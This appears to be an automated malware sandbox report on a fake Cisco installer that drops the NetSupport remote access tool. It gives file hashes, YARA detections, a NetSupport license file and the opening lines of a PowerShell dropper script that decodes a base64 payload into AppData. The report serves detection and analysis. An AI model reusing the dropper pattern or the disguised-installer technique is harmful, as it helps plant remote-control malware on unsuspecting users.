                                                                                                                                                                                                  SHA-512:407AD6D59035AC10A6CBEB368F72772A6CDBB889934BA4097046BD489CA5E36D4374E5C6655485AB28419D0EB45587C664E65113589E6131FB208D7ABDB4F885
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3233
                                                                                                                                                                                                  Entropy (8bit):5.341509881686345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:wYNZ3JpdhH+0dhH2EnEqZUmogaRvmL3dZMdr:wYH3JpdhH+0dhH/EqZUmoP+dZMdr
                                                                                                                                                                                                  MD5:0187FF566D704C12A49E4FBCE5E00C45
                                                                                                                                                                                                  SHA1:84BB1CECDD38FD203D2EE9691902C3FCCBDED366
                                                                                                                                                                                                  SHA-256:9EFBDCAD9BCD5A9B81AEA9B4643AD13799844117D8F41AA86882F808603037A2
                                                                                                                                                                                                  SHA-512:5C69EED3D00807A5ED8CB17981B23B50A4152E9044883DBB875011709C359CED146A83F740F0158E05C9C7ECE9AC52F5F9B15DE6128EE352A2424A7639708426
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:; vpnva-6.inf..;..; Cisco AnyConnect Virtual Miniport Adapter for Windows Setup File..;..; (c) Copyright 2004-2021 Cisco Systems, Inc.....[version]..Signature = "$Windows NT$"..Class = Net..ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}..Provider = %Cisco%..CatalogFile = vpnva-6.cat..DriverVer = 12/14/2021,4.10.05040.0....[Manufacturer]..%CISCO%..= Cisco, NTamd64....[ControlFlags]..ExcludeFromSelect = *....[Cisco]..%vpnva.DeviceDesc% = Cisco.ndi.NTx86, vpnva....[Cisco.NTamd64]..%vpnva.DeviceDesc64% = Cisco.ndi.NTamd64, vpnva....[Cisco.ndi.NTx86]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NCF_PHYSICAL..*IfType = 6 ; IF_TYPE_ETHERNET_CSMACD..*MediaType = 0 ; NdisMedium802_3..*PhysicalMediaType = 0 ; NdisPhysicalMediumUnspecified..AddReg...= Cisco.reg..CopyFiles..= Cisco.CopyFiles....[Cisco.ndi.NTamd64]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NC
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54176
                                                                                                                                                                                                  Entropy (8bit):6.343089804418659
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:/eDOHgIUkjxLqAW2ltHbfvFSzNhQxVBqv5jJwPB2M:2KHgIUkjxLqAW2l5vFSzNiqv51m
                                                                                                                                                                                                  MD5:98B8845F3554BAD1329541D54EADD3F0
                                                                                                                                                                                                  SHA1:FDB21CC76F860AB39D265A01846C81A707078BBB
                                                                                                                                                                                                  SHA-256:506AB485FE0DA85C6DF6D0B7ABBAD412ACA6A8EB3F575DFC2C81662107054792
                                                                                                                                                                                                  SHA-512:12D14D027679FE76820148D51A9B8AEAF5D024C5D49A85238B2D70780D05F046EEAB1F7A7EC8E50EE64851E3D9033443FF64E01FBCA35AE1AE56E5D09F4BB8D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89192
                                                                                                                                                                                                  Entropy (8bit):7.008180217438666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                                                                                  MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                                                                                  SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                                                                                  SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                                                                                  SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3572797
                                                                                                                                                                                                  Entropy (8bit):6.528409328427541
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5va:zVL/tnHGYiqlN
                                                                                                                                                                                                  MD5:CE7CF9ABC22DF2C802EF4938FADCB50A
                                                                                                                                                                                                  SHA1:F324AD2E8A1FF30F422EB3BB13B8E80B98BBDCAF
                                                                                                                                                                                                  SHA-256:0F0DAB61B8063CCB7AD2D178B5116A93031DB0721CCAA2B2538C79738407543C
                                                                                                                                                                                                  SHA-512:DF3BEF6A84F0FFF93735FA589452039F1BA38C77D8B03E81C3CEC77DA4C03E45EF5094DC8588A58B9D3742A7E63B9D9EA40A88A6013DCA9CF7A452ACBD3EB413
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:InnoSetup Log Cisco Systems {502F2F47-B99C-4049-8968-7EC11BF4EBD6}, version 0x418, 6157749 bytes, 141700\37\user\37, C:\Program Files (x86)\Cisco\376\377\377\0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6157749
                                                                                                                                                                                                  Entropy (8bit):4.028674519629248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:baa1cFHjbj643Ri2rnTwq+4WePF4kP3uim2pfdn99T:E
                                                                                                                                                                                                  MD5:10511CC91DB0564A889867FE583FBB32
                                                                                                                                                                                                  SHA1:CAB6F89BE730164BF2007AA6B523F2443351AF47
                                                                                                                                                                                                  SHA-256:5512004E3E6A7891A7943C017C112A79F0608BB5B469342EECE7A7B5CAA3AE03
                                                                                                                                                                                                  SHA-512:3D17452723DA6ACAB110DA9A733053957CB8C32028E7AA81D1F750B5719F83041D59A3EA8DFA0719B0DF43BEB1CCC622E536A9E887103D619BF771BF815CDD4C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Cisco\unins000.dat, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:Inno Setup Uninstall Log (b)....................................{502F2F47-B99C-4049-8968-7EC11BF4EBD6}}.........................................................................................Cisco Systems.......................................................................................................................X.....]..............................................................................................................................v........u........1.4.1.7.0.0......A.r.t.h.u.r......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o..................,.v.. .......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...........!MAIN....-1.v.....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3572797
                                                                                                                                                                                                  Entropy (8bit):6.528409328427541
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5va:zVL/tnHGYiqlN
                                                                                                                                                                                                  MD5:CE7CF9ABC22DF2C802EF4938FADCB50A
                                                                                                                                                                                                  SHA1:F324AD2E8A1FF30F422EB3BB13B8E80B98BBDCAF
                                                                                                                                                                                                  SHA-256:0F0DAB61B8063CCB7AD2D178B5116A93031DB0721CCAA2B2538C79738407543C
                                                                                                                                                                                                  SHA-512:DF3BEF6A84F0FFF93735FA589452039F1BA38C77D8B03E81C3CEC77DA4C03E45EF5094DC8588A58B9D3742A7E63B9D9EA40A88A6013DCA9CF7A452ACBD3EB413
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Oct 31 16:05:48 2024, mtime=Thu Oct 31 16:05:48 2024, atime=Tue Aug 15 15:45:32 2023, length=3058280, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1482
                                                                                                                                                                                                  Entropy (8bit):4.488169065827841
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mrsFdOEa2MgnqNei3EAw8Md/731d/kmfUUlne3tEJTvm:8mrsFdOHzkqNe0Tw8Md/z1d/kmMieUTv
                                                                                                                                                                                                  MD5:1E5545AF627A509BA1368C6151B25474
                                                                                                                                                                                                  SHA1:E0378E61868532CA2CF1B5FA867A1B203EA612D0
                                                                                                                                                                                                  SHA-256:3542099E80440F4CDE670453785B59DCBDC142F8F635FB1638C2B7745A176EB3
                                                                                                                                                                                                  SHA-512:93D5D8719D2CEEE5B928AA27C421FD8BD33BC8C5FD812E307BA73262BC59ABFB45358EA06534768E9F847B16F7A36694153ED7CD81F6BCDDAFE240561DA056E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:L..................F.... ....}.!.+..+..!.+.........h......................./....P.O. .:i.....+00.../C:\.....................1....._Y....PROGRA~2.........O.I_Y...... t..............V.......m.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....P.1....._Y....Cisco.<......_Y.._Y.......U....................1zP.C.i.s.c.o.....p.1....._Y....CISCOS~1..X......_Y.._Y.......W...................._L..C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.....H.1....._Y....UI..6......_Y.._Y......X_....................(K..U.I.....`.2.h....W.. .csc_ui.exe..F......_Y.._Y......._........................c.s.c._.u.i...e.x.e.......m...............-.......l...........p".......C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe..M.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.\.U.I.\.c.s.c._.u.i...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                  Entropy (8bit):3.077819531114783
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:llD:b
                                                                                                                                                                                                  MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                                                                                                                                  SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                                                                                                                                  SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                                                                                                                                  SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:40.7357,-74.1724
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1476
                                                                                                                                                                                                  Entropy (8bit):5.263393507017003
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:3JSGfbo4KMjKbm4r1od6lss4RPQoUP7mZ9txNBJt/NKwJ0hNpr8HJ9nPAl/:5SGfs4/ymKagv4RIoUP7mZ9trBLNGhNz
                                                                                                                                                                                                  MD5:526A97643E029C6623305EBFF6469FBC
                                                                                                                                                                                                  SHA1:492A91F93D9175A7D891BAC7B554800A68740E80
                                                                                                                                                                                                  SHA-256:39370C908D2F2FCDE417A4C71A6DBD69EC48994B7DB0D6596B0F67811B497AE9
                                                                                                                                                                                                  SHA-512:072C6A7A1D0B2C91CD3B5307D719E353E70EDED884506F6EF63402E8EBA265165DE6B4ECFCA0BB77189E9BBBE3ABED9798E03D3EE6B12BC6561FEA94D428B825
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:@...e...........,...............................................@...............|.jdY\.H.s9.!..|+.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4..................%`99B....9...........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\download\CiscoSetup.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3548672
                                                                                                                                                                                                  Entropy (8bit):6.54053651576307
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:6JYVM+LtVt3P/KuG2ONG9iqLRQf333f5vC:LVL/tnHGYiqlz
                                                                                                                                                                                                  MD5:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                                                                                  SHA1:49C54A003678DC14A19AC5D07C9BF053B8CD0683
                                                                                                                                                                                                  SHA-256:2EA785B8A4CF5C5FC457350A4C636DAC40137269A1A93D24C1083F1F77324D5D
                                                                                                                                                                                                  SHA-512:3E4E2A32F50C6BB200AF8A37C8653EF55E6D8FF47042266181546FD1CCF125A4FD5D2B7D8801D9179BF5E899C4992092895EE6F0D3F4E11AC8D5A1F40E5F82BF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65337), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3035662
                                                                                                                                                                                                  Entropy (8bit):5.9992843080053095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:Ae6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:f
                                                                                                                                                                                                  MD5:2D47F35F6EC3ABDFA6DF92CB13BEF294
                                                                                                                                                                                                  SHA1:16E532CAAC6B7176369F5FA29A869FFA0DEF8947
                                                                                                                                                                                                  SHA-256:85C3C72A135EE57914D27C563E9AE31F417AF72FA04AB2D3A09F10EB674455CB
                                                                                                                                                                                                  SHA-512:E6BE961E4F384749F621E3B14F2B1468F3218480DE3EEAA0C7A6448F70911FC942B30D1C135729EDEA9BD489C8B5F42FD255617A79428568DF2A58F9D6C0E134
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\Cisco";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "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
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):93560
                                                                                                                                                                                                  Entropy (8bit):6.5461580255883876
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                                                                                                  MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                                                                                                  SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                                                                                                  SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                                                                                                  SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328056
                                                                                                                                                                                                  Entropy (8bit):6.754723001562745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                                                                                  MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                                                                                  SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                                                                                  SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                                                                                  SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):259
                                                                                                                                                                                                  Entropy (8bit):5.103526864179364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                                                                                                  MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                                                                                                                  SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                                                                                                  SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                                                                                                  SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18808
                                                                                                                                                                                                  Entropy (8bit):6.22028391196942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                                                                                  MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                                                                                  SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                                                                                  SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                                                                                  SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3642864
                                                                                                                                                                                                  Entropy (8bit):6.5156874906689275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                                                                                                  MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                                                                                                  SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                                                                                                  SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
